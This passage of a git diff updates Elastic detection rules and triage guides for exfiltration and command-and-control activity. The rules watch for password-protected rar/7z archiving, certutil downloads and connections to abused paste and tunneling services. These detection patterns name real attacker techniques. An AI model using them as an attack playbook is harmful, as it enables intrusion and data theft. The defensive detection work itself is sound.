Encryption can be used to hide information that is\nbeing exfiltrated from detection or make exfiltration less apparent upon inspection by a defender.\n\nThese steps are usually done in preparation for exfiltration, meaning the attack may be in its final stages.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Retrieve the encrypted file.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check if the password used in the encryption was included in the command line.\n- Decrypt the `.rar`/`.zip` and check if the information is sensitive.\n- If the password is not available, and the format is `.zip` or the option used in WinRAR is not the `-hp`, list the\nfile names included in the encrypted file.\n- Investigate if the file was transferred to an attacker-controlled server.\n\n### False positive analysis\n\n- Backup software can use these utilities. Check the `process.parent.executable` and\n`process.parent.command_line` fields to determine what triggered the encryption.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Prioritize cases that involve personally identifiable information (PII) or other classified data.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "process where event.type in (\"start\", \"process_started\") and\n ((process.name:\"rar.exe\" or process.code_signature.subject_name == \"win.rar GmbH\" or\n process.pe.original_file_name == \"Command line RAR\") and\n process.args == \"a\" and process.args : (\"-hp*\", \"-p*\", \"-dw\", \"-tb\", \"-ta\", \"/hp*\", \"/p*\", \"/dw\", \"/tb\", \"/ta\"))\n\n or\n (process.pe.original_file_name in (\"7z.exe\", \"7za.exe\") and\n process.args == \"a\" and process.args : (\"-p*\", \"-sdel\"))\n\n /* uncomment if noisy for backup software related FPs */\n /* not process.parent.executable : (\"C:\\\\Program Files\\\\*.exe\", \"C:\\\\Program Files (x86)\\\\*.exe\") */\n", "references": [ "https://www.welivesecurity.com/2020/12/02/turla-crutch-keeping-back-door-open/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "45d273fb-1dca-457d-9855-bcb302180c21", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", 
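Review bot: The rewritten `note` string now ends at `mean time to respond (MTTR)."` without the trailing `\n` that the other rewritten notes in this commit keep (the certutil rule's note still ends `(MTTR).\n"`). Keeping the terminator consistent across the guides avoids a spurious whitespace diff the next time they are regenerated; the only intended change to this note is the `## Config` section moving to `setup`.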
@@ -53,5 +81,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "eql",
- "version": 6
+ "version": 8
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_certutil_network_connection.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_certutil_network_connection.json
index e3c9edaf003dc..1aa0bd6168a51 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_certutil_network_connection.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_certutil_network_connection.json
@@ -12,12 +12,34 @@ "language": "eql", "license": "Elastic License v2", "name": "Network Connection via Certutil", - "note": "## Triage and analysis\n\n### Investigating Network Connection via Certutil\n\nAttackers can abuse `certutil.exe` to download malware, offensive security tools, and certificates from external sources\nin order to take the next steps in a compromised environment.\n\nThis rule looks for network events where `certutil.exe` contacts IP ranges other than the ones specified in\n[IANA IPv4 Special-Purpose Address Registry](https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml)\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate if the downloaded file was executed.\n- Determine the context in which `certutil.exe` and the file were run.\n- Retrieve the downloaded file and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. 
If trusted software uses this command and the triage has not identified\nanything suspicious, this alert can be closed as a false positive.\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination\nof user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Network Connection via Certutil\n\nAttackers can abuse `certutil.exe` to download malware, offensive security tools, and certificates from external sources\nin order to take the next steps in a compromised environment.\n\nThis rule looks for network events where `certutil.exe` contacts IP ranges other than the ones specified in\n[IANA IPv4 Special-Purpose Address Registry](https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml)\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate if the downloaded file was executed.\n- Determine the context in which `certutil.exe` and the file were run.\n- Retrieve the downloaded file and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. 
If trusted software uses this command and the triage has not identified\nanything suspicious, this alert can be closed as a false positive.\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination\nof user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n", "query": "sequence by process.entity_id\n [process where process.name : \"certutil.exe\" and event.type == \"start\"]\n [network where process.name : \"certutil.exe\" and\n not cidrmatch(destination.ip, \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\",\n \"192.0.0.0/29\", \"192.0.0.8/32\", \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\",\n \"192.0.0.171/32\", \"192.0.2.0/24\", \"192.31.196.0/24\", \"192.52.193.0/24\",\n \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\", \"100.64.0.0/10\", \"192.175.48.0/24\",\n \"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \"::1\",\n \"FE80::/10\", \"FF00::/8\")]\n", "references": [ "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml", "https://frsecure.com/malware-incident-response-playbook/" ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "3838e0e3-1850-4850-a411-2e8c5ba40ba8", "severity": "low", @@ -46,5 +68,5 @@ } ], "type": "eql", - "version": 8 + "version": 10 } 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_cobalt_strike_default_teamserver_cert.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_cobalt_strike_default_teamserver_cert.json
index 7934d803bd766..15bc6d4cbefa1 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_cobalt_strike_default_teamserver_cert.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_cobalt_strike_default_teamserver_cert.json
@@ -22,6 +22,28 @@
 "https://www.elastic.co/guide/en/beats/filebeat/7.9/filebeat-module-suricata.html",
 "https://www.elastic.co/guide/en/beats/filebeat/7.9/filebeat-module-zeek.html"
 ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.category",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "tls.server.hash.md5",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "tls.server.hash.sha1",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "tls.server.hash.sha256",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 99,
 "rule_id": "e7075e8d-a966-458e-a183-85cd331af255",
 "severity": "critical",
@@ -59,5 +81,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 6
+ "version": 7
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_common_webservices.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_common_webservices.json
index 1b7b241c7febd..6de1031e27e2a 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_common_webservices.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_common_webservices.json
@@ -12,6 +12,33 @@ "name": "Connection to Commonly Abused Web Services", "note": "## Triage and analysis\n\n### Investigating Connection to Commonly Abused Web Services\n\nAdversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised\nsystem. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the\nlikelihood that hosts within a network are already communicating with them prior to a compromise.\n\nThis rule looks for processes outside known legitimate program locations communicating with a list of services that can\nbe abused for exfiltration or command and control.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Verify whether the digital signature exists in the executable.\n- Identify the operation type (upload, download, tunneling, etc.).\n- Retrieve the process executable and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This rule has a high chance to produce false positives because it detects communication with legitimate services. 
Noisy\nfalse positives can be added as exceptions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n", "query": "network where network.protocol == \"dns\" and\n process.name != null and user.id not in (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\") and\n /* Add new WebSvc domains here */\n dns.question.name :\n (\n \"raw.githubusercontent.*\",\n \"*.pastebin.*\",\n \"*drive.google.*\",\n \"*docs.live.*\",\n \"*api.dropboxapi.*\",\n \"*dropboxusercontent.*\",\n \"*onedrive.*\",\n \"*4shared.*\",\n \"*.file.io\",\n \"*filebin.net\",\n \"*slack-files.com\",\n \"*ghostbin.*\",\n \"*ngrok.*\",\n \"*portmap.*\",\n \"*serveo.net\",\n \"*localtunnel.me\",\n \"*pagekite.me\",\n \"*localxpose.io\",\n \"*notabug.org\",\n \"rawcdn.githack.*\",\n \"paste.nrecom.net\",\n \"zerobin.net\",\n \"controlc.com\",\n \"requestbin.net\",\n \"cdn.discordapp.com\",\n \"discordapp.com\",\n \"discord.com\"\n ) and\n /* Insert noisy false positives 
here */\n not process.executable :\n (\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Windows\\\\System32\\\\WWAHost.exe\",\n \"?:\\\\Windows\\\\System32\\\\smartscreen.exe\",\n \"?:\\\\Windows\\\\System32\\\\MicrosoftEdgeCP.exe\",\n \"?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\*\\\\MsMpEng.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Programs\\\\Fiddler\\\\Fiddler.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\OneDrive.exe\",\n \"?:\\\\Windows\\\\system32\\\\mobsync.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\mobsync.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Discord\\\\app-*\\\\Discord.exe\"\n )\n", + "required_fields": [ + { + "ecs": true, + "name": "dns.question.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.protocol", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "66883649-f908-4a5b-a1e0-54090a1d3a32", "severity": "low", @@ -68,5 +95,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 9 + "version": 10 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_connection_attempt_by_non_ssh_root_session.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_connection_attempt_by_non_ssh_root_session.json index 7cdba833a00e5..0a77195508bed 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_connection_attempt_by_non_ssh_root_session.json 
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_connection_attempt_by_non_ssh_root_session.json 
@@ -14,12 +14,39 @@ "license": "Elastic License v2", "name": "Suspicious Network Connection Attempt by Root", "note": "## Triage and analysis\n### Investigating Connection Attempt by Non-SSH Root Session\nDetection alerts from this rule indicate a strange or abnormal outbound connection attempt by a privileged process. Here are some possible avenues of investigation:\n- Examine unusual and active sessions using commands such as 'last -a', 'netstat -a', and 'w -a'.\n- Analyze processes and command line arguments to detect anomalous process execution that may be acting as a listener.\n- Analyze anomalies in the use of files that do not normally initiate connections.\n- Examine processes utilizing the network that do not normally have network communication.\n", - "query": "sequence by process.entity_id with maxspan=1m\n[network where event.type == \"start\" and event.action == \"connection_attempted\" and user.id == \"0\" and \n not process.executable : (\"/bin/ssh\", \"/sbin/ssh\", \"/usr/lib/systemd/systemd\")]\n[process where event.action == \"session_id_change\" and user.id == \"0\"]\n", + "query": "sequence by process.entity_id with maxspan=1m\n[network where event.type == \"start\" and event.action == \"connection_attempted\" and user.id == \"0\" and \n not process.executable : (\"/bin/ssh\", \"/sbin/ssh\", \"/usr/lib/systemd/systemd\", \"/usr/sbin/sshd\")]\n[process where event.action == \"session_id_change\" and user.id == \"0\" and\n not process.executable : (\"/bin/ssh\", \"/sbin/ssh\", \"/usr/lib/systemd/systemd\", \"/usr/sbin/sshd\")]\n", "references": [ "https://www.sandflysecurity.com/blog/linux-file-masquerading-and-malicious-pids-sandfly-1-2-6-update/", "https://twitter.com/GossiTheDog/status/1522964028284411907", "https://exatrack.com/public/Tricephalic_Hellkeeper.pdf" ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + 
"name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], "risk_score": 43, "rule_id": "eb6a3790-d52d-11ec-8ce9-f661ea17fbce", "severity": "medium", @@ -70,5 +97,5 @@ } ], "type": "eql", - "version": 1 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_dns_directly_to_the_internet.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_dns_directly_to_the_internet.json deleted file mode 100644 index f57bd65b6d992..0000000000000 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_dns_directly_to_the_internet.json +++ /dev/null 
@@ -1,49 +0,0 @@
-{
- "author": [
- "Elastic"
- ],
- "description": "This rule detects when an internal network client sends DNS traffic directly to the Internet. This is atypical behavior for a managed network and can be indicative of malware, exfiltration, command and control, or simply misconfiguration. This DNS activity also impacts your organization's ability to provide enterprise monitoring and logging of DNS, and it opens your network to a variety of abuses and malicious communications.",
- "false_positives": [
- "Exclude DNS servers from this rule as this is expected behavior. Endpoints usually query local DNS servers defined in their DHCP scopes, but this may be overridden if a user configures their endpoint to use a remote DNS server. This is uncommon in managed enterprise networks because it could break intranet name resolution when split horizon DNS is utilized. Some consumer VPN services and browser plug-ins may send DNS traffic to remote Internet destinations. In that case, such devices or networks can be excluded from this rule when this is expected behavior."
- ],
- "from": "now-9m",
- "index": [
- "auditbeat-*",
- "filebeat-*",
- "packetbeat-*",
- "logs-endpoint.events.*"
- ],
- "language": "kuery",
- "license": "Elastic License v2",
- "name": "DNS Activity to the Internet",
- "query": "event.category:(network or network_traffic) and (event.type:connection or type:dns) and (destination.port:53 or event.dataset:zeek.dns)\n and source.ip:(\n 10.0.0.0/8 or\n 172.16.0.0/12 or\n 192.168.0.0/16\n ) and\n not destination.ip:(\n 10.0.0.0/8 or\n 127.0.0.0/8 or\n 169.254.0.0/16 or\n 172.16.0.0/12 or\n 192.0.0.0/24 or\n 192.0.0.0/29 or\n 192.0.0.8/32 or\n 192.0.0.9/32 or\n 192.0.0.10/32 or\n 192.0.0.170/32 or\n 192.0.0.171/32 or\n 192.0.2.0/24 or\n 192.31.196.0/24 or\n 192.52.193.0/24 or\n 192.168.0.0/16 or\n 192.88.99.0/24 or\n 224.0.0.0/4 or\n 100.64.0.0/10 or\n 192.175.48.0/24 or\n 198.18.0.0/15 or\n 198.51.100.0/24 or\n 203.0.113.0/24 or\n 240.0.0.0/4 or\n \"::1\" or\n \"FE80::/10\" or\n \"FF00::/8\"\n )\n",
- "references": [
- "https://www.us-cert.gov/ncas/alerts/TA15-240A",
- "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-81-2.pdf",
- "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml"
- ],
- "risk_score": 47,
- "rule_id": "6ea71ff0-9e95-475b-9506-2580d1ce6154",
- "severity": "medium",
- "tags": [
- "Elastic",
- "Network",
- "Threat Detection",
- "Command and Control",
- "Host"
- ],
- "threat": [
- {
- "framework": "MITRE ATT&CK",
- "tactic": {
- "id": "TA0011",
- "name": "Command and Control",
- "reference": "https://attack.mitre.org/tactics/TA0011/"
- },
- "technique": []
- }
- ],
- "timestamp_override": "event.ingested",
- "type": "query",
- "version": 12
-}
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_dns_tunneling_nslookup.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_dns_tunneling_nslookup.json
index 2a630beddd367..573fe55e096f4 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_dns_tunneling_nslookup.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_dns_tunneling_nslookup.json
@@ -17,6 +17,28 @@
 "references": [
 "https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/"
 ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.category",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.args",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "3a59fc81-99d3-47ea-8cd6-d48d561fca20",
 "severity": "medium",
@@ -58,5 +80,5 @@
 "value": 15
 },
 "type": "threshold",
- "version": 5
+ "version": 6
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_download_rar_powershell_from_internet.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_download_rar_powershell_from_internet.json
index f7bd19f63acb6..0479f9bd7fb5a 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_download_rar_powershell_from_internet.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_download_rar_powershell_from_internet.json
@@ -23,6 +23,38 @@
 "https://www.justice.gov/opa/press-release/file/1084361/download",
 "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml"
 ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "destination.ip",
+ "type": "ip"
+ },
+ {
+ "ecs": true,
+ "name": "event.category",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "network.protocol",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "source.ip",
+ "type": "ip"
+ },
+ {
+ "ecs": true,
+ "name": "url.extension",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "url.path",
+ "type": "wildcard"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "ff013cb4-274d-434a-96bb-fe15ddd3ae92",
 "severity": "medium",
@@ -52,5 +84,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 9
+ "version": 10
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_encrypted_channel_freesslcert.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_encrypted_channel_freesslcert.json
index d7dd6dcf48762..81e58759a8d74 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_encrypted_channel_freesslcert.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_encrypted_channel_freesslcert.json
@@ -12,10 +12,33 @@ "language": "eql", "license": "Elastic License v2", "name": "Connection to Commonly Abused Free SSL Certificate Providers", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "network where network.protocol == \"dns\" and\n /* Add new free SSL certificate provider domains here */\n dns.question.name : (\"*letsencrypt.org\", \"*.sslforfree.com\", \"*.zerossl.com\", \"*.freessl.org\") and\n \n /* Native Windows process paths that are unlikely to have network connections to domains secured using free SSL certificates */\n process.executable : (\"C:\\\\Windows\\\\System32\\\\*.exe\",\n \"C:\\\\Windows\\\\System\\\\*.exe\",\n\t \"C:\\\\Windows\\\\SysWOW64\\\\*.exe\",\n\t\t \"C:\\\\Windows\\\\Microsoft.NET\\\\Framework*\\\\*.exe\",\n\t\t \"C:\\\\Windows\\\\explorer.exe\",\n\t\t \"C:\\\\Windows\\\\notepad.exe\") and\n \n /* Insert noisy false positives here */\n not process.name : (\"svchost.exe\", \"MicrosoftEdge*.exe\", \"msedge.exe\")\n", + "note": "", + "query": "network where network.protocol == \"dns\" and\n /* Add new free SSL certificate provider domains here */\n dns.question.name : (\"*letsencrypt.org\", \"*.sslforfree.com\", \"*.zerossl.com\", \"*.freessl.org\") and\n\n /* Native Windows process paths that are unlikely to have network connections to domains secured using free SSL certificates */\n process.executable : (\"C:\\\\Windows\\\\System32\\\\*.exe\",\n \"C:\\\\Windows\\\\System\\\\*.exe\",\n\t \"C:\\\\Windows\\\\SysWOW64\\\\*.exe\",\n\t\t \"C:\\\\Windows\\\\Microsoft.NET\\\\Framework*\\\\*.exe\",\n\t\t \"C:\\\\Windows\\\\explorer.exe\",\n\t\t \"C:\\\\Windows\\\\notepad.exe\") and\n\n /* Insert noisy false positives here */\n not process.name : 
(\"svchost.exe\", \"MicrosoftEdge*.exe\", \"msedge.exe\")\n", + "required_fields": [ + { + "ecs": true, + "name": "dns.question.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.protocol", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "e3cf38fa-d5b8-46cc-87f9-4a7513e4281d", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -43,5 +66,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_iexplore_via_com.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_iexplore_via_com.json index f86a96c81460c..46ff46cab40b9 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_iexplore_via_com.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_iexplore_via_com.json 
@@ -16,6 +16,53 @@ "license": "Elastic License v2", "name": "Potential Command and Control via Internet Explorer", "query": "sequence by host.id, user.name with maxspan = 5s\n [library where dll.name : \"IEProxy.dll\" and process.name : (\"rundll32.exe\", \"regsvr32.exe\")]\n [process where event.type == \"start\" and process.parent.name : \"iexplore.exe\" and process.parent.args : \"-Embedding\"]\n /* IE started via COM in normal conditions makes few connections, mainly to Microsoft and OCSP related domains, add FPs here */\n [network where network.protocol == \"dns\" and process.name : \"iexplore.exe\" and\n not dns.question.name :\n (\n \"*.microsoft.com\",\n \"*.digicert.com\",\n \"*.msocsp.com\",\n \"*.windowsupdate.com\",\n \"*.bing.com\",\n \"*.identrust.com\",\n \"*.sharepoint.com\",\n \"*.office365.com\",\n \"*.office.com\"\n )\n ] /* with runs=5 */\n", + "required_fields": [ + { + "ecs": true, + "name": "dll.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "dns.question.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.protocol", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, 